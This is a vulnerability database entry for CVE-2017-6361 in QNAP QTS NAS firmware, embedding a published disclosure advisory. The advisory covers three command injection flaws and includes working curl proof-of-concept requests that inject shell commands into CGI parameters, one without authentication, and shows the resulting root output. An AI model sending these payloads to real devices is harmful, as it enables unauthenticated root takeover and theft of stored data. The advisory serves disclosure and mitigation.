Vulnerabilities > CVE-2017-6361 - OS Command Injection vulnerability in Qnap QTS
Attack vector
NETWORK Attack complexity
LOW Privileges required
NONE Confidentiality impact
COMPLETE Integrity impact
COMPLETE Availability impact
COMPLETE Summary
QNAP QTS before 4.2.4 Build 20170313 allows attackers to execute arbitrary commands via unspecified vectors.
Vulnerable Configurations
| Part | Description | Count |
|---|---|---|
| OS | 11 |
Common Weakness Enumeration (CWE)
Common Attack Pattern Enumeration and Classification (CAPEC)
- Command Line Execution through SQL Injection An attacker uses standard SQL injection methods to inject data into the command line for execution. This could be done directly through misuse of directives such as MSSQL_xp_cmdshell or indirectly through injection of data into the database that would be interpreted as shell commands. Sometime later, an unscrupulous backend application (or could be part of the functionality of the same application) fetches the injected data stored in the database and uses this data as command line arguments without performing proper validation. The malicious data escapes that data plane by spawning new commands to be executed on the host.
- Command Delimiters An attack of this type exploits a programs' vulnerabilities that allows an attacker's commands to be concatenated onto a legitimate command with the intent of targeting other resources such as the file system or database. The system that uses a filter or a blacklist input validation, as opposed to whitelist validation is vulnerable to an attacker who predicts delimiters (or combinations of delimiters) not present in the filter or blacklist. As with other injection attacks, the attacker uses the command delimiter payload as an entry point to tunnel through the application and activate additional attacks through SQL queries, shell commands, network scanning, and so on.
- Exploiting Multiple Input Interpretation Layers An attacker supplies the target software with input data that contains sequences of special characters designed to bypass input validation logic. This exploit relies on the target making multiples passes over the input data and processing a "layer" of special characters with each pass. In this manner, the attacker can disguise input that would otherwise be rejected as invalid by concealing it with layers of special/escape characters that are stripped off by subsequent processing steps. The goal is to first discover cases where the input validation layer executes before one or more parsing layers. That is, user input may go through the following logic in an application: In such cases, the attacker will need to provide input that will pass through the input validator, but after passing through parser2, will be converted into something that the input validator was supposed to stop.
- Argument Injection An attacker changes the behavior or state of a targeted application through injecting data or command syntax through the targets use of non-validated and non-filtered arguments of exposed services or methods.
- OS Command Injection In this type of an attack, an adversary injects operating system commands into existing application functions. An application that uses untrusted input to build command strings is vulnerable. An adversary can leverage OS command injection in an application to elevate privileges, execute arbitrary commands and compromise the underlying operating system.
Exploit-Db
| description | QNAP TVS-663 QTS < 4.2.4 build 20170313 - Command Injection. CVE-2017-6359,CVE-2017-6360,CVE-2017-6361. Webapps exploit for CGI platform. Tags: Command In... |
| file | exploits/cgi/webapps/41842.txt |
| id | EDB-ID:41842 |
| last seen | 2017-04-07 |
| modified | 2017-04-07 |
| platform | cgi |
| port | |
| published | 2017-04-07 |
| reporter | Exploit-DB |
| source | https://www.exploit-db.com/download/41842/ |
| title | QNAP TVS-663 QTS < 4.2.4 build 20170313 - Command Injection |
| type | webapps |
Packetstorm
| data source | https://packetstormsecurity.com/files/download/142036/qnapqts-exec.txt |
| id | PACKETSTORM:142036 |
| last seen | 2017-04-10 |
| published | 2017-04-06 |
| reporter | Harry Sintonen |
| source | https://packetstormsecurity.com/files/142036/QNAP-QTS-Remote-Command-Injection.html |
| title | QNAP QTS Remote Command Injection |
Seebug
| bulletinFamily | exploit |
| description | QNAP QTS multiple RCE vulnerabilities The latest version of this advisory is available at: https://sintonen.fi/advisories/qnap-qts-multiple-rce-vulnerabilities.txt Overview -------- QNAP QTS firmware contains multiple Command Injection (CWE-77) vulnerabilities that can be exploited to gain remote command execution on the devices. Description ----------- QNAP QTS web user interface CGI binaries include Command Injection (CWE-77) vulnerabilities. An unauthenticated attacker can execute arbitrary commands on the targeted device. Impact ------ The attacker is able to execute arbitrary commands as administrative user (root). The attacker has full access to all content on the targeted device, and can read, modify or remove content at will. Details ------- The discovered vulnerabilities, described in more detail below, enable multiple independent attacks described here in brief: - Unauthenticated Remote Command Execution The unauthenticated attacker can perform HTTP requests that exploit the vulnerability to execute arbitrary commands. If the device is connected to the internet, the vulnerable devices can be taken over in an automated fashion and can then be used for further attacks. - Authenticated Remote Command Execution The authenticated attacker can perform HTTP requests that exploit the vulnerabilities to execute arbitrary commands. This gives users that normally have only restricted access to the device full administrative (root) access to the system and access to all data stored on the device regardless of the specified access limitations. Vulnerabilities --------------- 1.[CVE-2017-6361] Command Injection in authLogin.cgi `reboot_notice_msg' (CWE-77) /cgi-bin/authLogin.cgi CGI has a command injection bug. The following commands are executed via system(): ``` /sbin/vjbod_util -i '%s' 1>>/dev/null 2>&1 /sbin/vdd_control "%s" %d 2>>/dev/null 2>>/dev/null ``` The value inserted to %s is obtained from the `reboot_notice_msg' HTTP request GET parameter. The reboot_notice_msg is a base64 encoded message of form: QNAPVJBDTTTTTTTTCCCCCCCCCCCCCCCCLLLLPAYLOAD - TTTTTTTT is the unix time stamp (last 8 digits) - CCCCCCCCCCCCCCCC is the command to perform (Disconnect) - LLLL is the payload length - PAYLOAD is the payload contents (LLLL bytes) By creating a crafted reboot_notice_msg value, arbitrary commands can be executed. For example: ``` QNAPVJBD88150863 Disconnect 14`(echo;id)>&2` $ curl -ki "https://TARGET/cgi-bin/authLogin.cgi?reboot_notice_msg=$(printf 'QNAPVJBD%08d%16s 14`(echo;id)>&2`' $(expr $(date +%s) % 100000000) Disconnect|base64|tr -d '\r\n')" uid=0(admin) gid=0(administrators) groups=0(administrators),100(everyone) Content-type: text/xml <?xml version="1.0" encoding="UTF-8" ?> <QDocRoot version="1.0"> <command>Disconnect</command> <payload>`(echo;id)>&2`</payload> </QDocRoot> $ ``` 2.[CVE-2017-6360] Command Injection in userConfig.cgi cloudPersonalSmtp `hash' (CWE-77) /cgi-bin/userConfig.cgi CGI has a command injection bug. The following command is executed via popen(): ``` /sbin/cloud_util -r %s 2>/dev/null ``` The value inserted to %s is obtained from the `hash' HTTP request GET parameter. An authenticated user can use a specially crafted hash parameter to execute arbitrary commands as root: ``` $ curl -ki 'https://TARGET/cgi-bin/userConfig.cgi?func=cloudPersonalSmtp&sid=SIDVALUE&hash=`(echo;id;uname%20-a)>%262`' HTTP/1.1 200 OK Date: Sun, 26 Feb 2017 22:55:48 GMT Transfer-Encoding: chunked Content-Type: text/plain uid=0(admin) gid=0(administrators) groups=0(administrators),100(everyone) Linux TARGET 3.12.6 #1 SMP Mon Feb 13 01:43:01 CST 2017 x86_64 unknown Content-type: text/html; charset="UTF-8" Usage: /sbin/cloud_util -r [enc_token] $ ``` 3.[CVE-2017-6359] Command Injection in utilRequest.cgi cancel_trash_recovery `pid' (CWE-77) /cgi-bin/filemanager/utilRequest.cgi CGI has a command injection bug. The following commands are executed via system(): ``` /bin/kill -9 %s ``` The value inserted to %s is obtained from the `pid' HTTP request GET parameter. An authenticated user can use a specially crafted pid parameter to execute arbitrary commands as root: ``` $ curl -k 'https://TARGET/cgi-bin/filemanager/utilRequest.cgi?func=cancel_trash_recovery&sid=SIDVALUE&pid=`id>/tmp/pwned`' { "version": "4.2.1", "build": "20170213", "status": 0, "success": "true" } [~] # cat /tmp/pwned uid=0(admin) gid=0(administrators) groups=0(administrators),100(everyone) [~] # ``` Vulnerable devices ------------------ The vulnerabilities were discovered from an QNAP TVS-663, firmware version 4.2.2 Build 20161214. They're also confirmed to work with version 4.2.3 Build 20170213. CVE-2017-6361 was also confirmed on QNAP HS-251+ running QTS 4.2.2 Build 20161028. It is believed that these vulnerabilities affect all devices running QTS. Recommendations to vendor ------------------------- 1. Fix the command injection vulnerabilities by performing proper input validation (whitelisting) and/or shell metacharacter escaping, or by utilizing execl family of functions. End user mitigation ------------------- - Install the firmware update version 4.2.4 build 20170313 or later. OR - Restrict access to the web user interface (ports 8080 and 443). Credits ------- The vulnerabilities were discovered by Harry Sintonen / F-Secure Corporation. Timeline -------- 21.01.2017 discovered vulnerabilities 2 and 3 23.02.2017 discovered vulnerability 1 23.02.2017 reported vulnerability 1 to the vendor 26.02.2017 started to write a preliminary advisory 27.02.2017 sent the preliminary advisory to vendor and CERT-FI 27.02.2017 requested CVE-IDs from MITRE 28.02.2017 received CVE-IDs from MITRE 02.03.2017 inquired status from vendor contact 02.03.2017 vendor confirmed CVE-2017-6361 04.03.2017 vendor confirmed the other two vulnerabilities 13.03.2017 vendor communicated about a upcoming release fixing the vulns 14.03.2017 vendor released QTS 4.2.4 build 20170313 fixing the vulns 15.03.2017 sent update to CERT-FI 21.03.2017 vendor released NAS-201703-21 advisory: https://www.qnap.com/en/support/con_show.php?cid=113 06.04.2017 public release of the advisory |
| id | SSV:92918 |
| last seen | 2017-11-19 |
| modified | 2017-04-07 |
| published | 2017-04-07 |
| reporter | Anonymous |
| title | QNAP QTS multiple RCE vulnerabilities (CVE-2017-6361, CVE-2017-6360, CVE-2017-6359) |